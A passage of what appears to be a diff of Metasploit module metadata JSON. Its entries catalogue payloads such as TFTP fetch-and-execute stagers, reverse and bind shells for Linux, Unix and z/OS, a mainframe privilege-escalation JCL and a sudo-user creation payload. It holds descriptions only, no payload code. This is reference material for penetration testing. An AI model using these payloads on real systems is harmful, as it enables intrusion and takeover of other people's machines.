300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hal" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/read_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/read_file", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell/bind_ipv6_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": 
null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/shell/bind_nonx_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", - "fullname": 
"payload/cmd/linux/tftp/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/bind_tcp_uuid": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/shell/find_tag": { - "name": "TFTP Fetch, Linux Command Shell, Find Tag Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/find_tag", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/tftp/x86/shell/reverse_ipv6_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", - 
"references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/reverse_nonx_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux Command 
Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/reverse_tcp_uuid": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/shell_bind_ipv6_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection over IPv6 and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_bind_tcp_random_port": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Geyslan G. Bem ", - "Aleh Boitsau " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", - "EDB-41631" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_find_port": { - "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": 
"payload/cmd/linux/tftp/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_find_port", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_find_tag": { - "name": "TFTP Fetch, Linux Command Shell, Find Tag Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_find_tag", - "staged": 
false - }, - "payload_cmd/linux/tftp/x86/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle ", - "joev " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_reverse_tcp_ipv6": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Matteo Malvica " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", - "staged": false - }, - "payload_cmd/mainframe/apf_privesc_jcl": { - "name": "JCL to Escalate Privileges", - "fullname": "payload/cmd/mainframe/apf_privesc_jcl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls", - "Ayoub" - ], - "description": "Elevate privileges for user. Adds\n SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using\n an unsecured/updateable APF authorized library (APFLIB) and updating\n the user's ACEE using this program/library. Note: This privesc only\n works with z/OS systems using RACF, no other ESM is supported.", - "references": [], - "platform": "Mainframe", - "arch": "cmd", - "rport": 21, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb", - "is_install_path": true, - "ref_name": "cmd/mainframe/apf_privesc_jcl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/mainframe/bind_shell_jcl": { - "name": "Z/OS (MVS) Command Shell, Bind TCP", - "fullname": "payload/cmd/mainframe/bind_shell_jcl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls" - ], - "description": "Provide JCL which creates a bind shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. 
MSF handles\n this automatically.", - "references": [], - "platform": "Mainframe", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb", - "is_install_path": true, - "ref_name": "cmd/mainframe/bind_shell_jcl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/mainframe/generic_jcl": { - "name": "Generic JCL Test for Mainframe Exploits", - "fullname": "payload/cmd/mainframe/generic_jcl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls" - ], - "description": "Provide JCL which can be used to submit\n a job to JES2 on z/OS which will exit and return 0. This\n can be used as a template for other JCL based payloads", - "references": [], - "platform": "Mainframe", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/mainframe/generic_jcl.rb", - "is_install_path": true, - "ref_name": "cmd/mainframe/generic_jcl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/mainframe/reverse_shell_jcl": { - "name": "Z/OS (MVS) Command Shell, Reverse TCP", - "fullname": "payload/cmd/mainframe/reverse_shell_jcl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls" - ], - "description": "Provide JCL which creates a reverse shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. 
MSF handles\n this automatically.", - "references": [], - "platform": "Mainframe", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb", - "is_install_path": true, - "ref_name": "cmd/mainframe/reverse_shell_jcl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/adduser": { - "name": "Add user with useradd", - "fullname": "payload/cmd/unix/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Nick Cottrell " - ], - "description": "Creates a new user. By default the new user is set with sudo\n but other options exist to make the new user automatically\n root but this is not automatically set since the new user will\n be treated as root (and login may be difficult). 
The new user\n can also be set as just a standard user if desired.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-01 12:30:26 +0000", - "path": "/modules/payloads/singles/cmd/unix/adduser.rb", - "is_install_path": true, - "ref_name": "cmd/unix/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_awk": { - "name": "Unix Command Shell, Bind TCP (via AWK)", - "fullname": "payload/cmd/unix/bind_awk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "espreto ", - "Ulisses Castro " - ], - "description": "Listen for a connection and spawn a command shell via GNU AWK", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_awk.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_awk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_aws_instance_connect": { - "name": "Unix SSH Shell, Bind Instance Connect (via AWS API)", - "fullname": "payload/cmd/unix/bind_aws_instance_connect", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an SSH shell using AWS Instance Connect", - "references": [ - "URL-https://www.sempervictus.com/single-post/a-serial-case-of-air-on-the-side-channel" - ], - "platform": "Unix", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, 
ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_aws_instance_connect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_busybox_telnetd": { - "name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)", - "fullname": "payload/cmd/unix/bind_busybox_telnetd", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Matthew Kienow " - ], - "description": "Listen for a connection and spawn a command shell via BusyBox telnetd", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_busybox_telnetd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_inetd": { - "name": "Unix Command Shell, Bind TCP (inetd)", - "fullname": "payload/cmd/unix/bind_inetd", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell (persistent)", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_inetd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_jjs": { - "name": "Unix Command Shell, Bind TCP (via jjs)", - "fullname": "payload/cmd/unix/bind_jjs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "conerpirate", - "bcoles " - ], - "description": "Listen for a connection and spawn a command shell via jjs", - "references": [ - "URL-https://gtfobins.github.io/gtfobins/jjs/", - "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", - "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" - ], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_jjs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_lua": { - "name": "Unix Command Shell, Bind TCP (via Lua)", - "fullname": "payload/cmd/unix/bind_lua", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "xistence " - ], - "description": "Listen for a connection and spawn a command shell via Lua", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": 
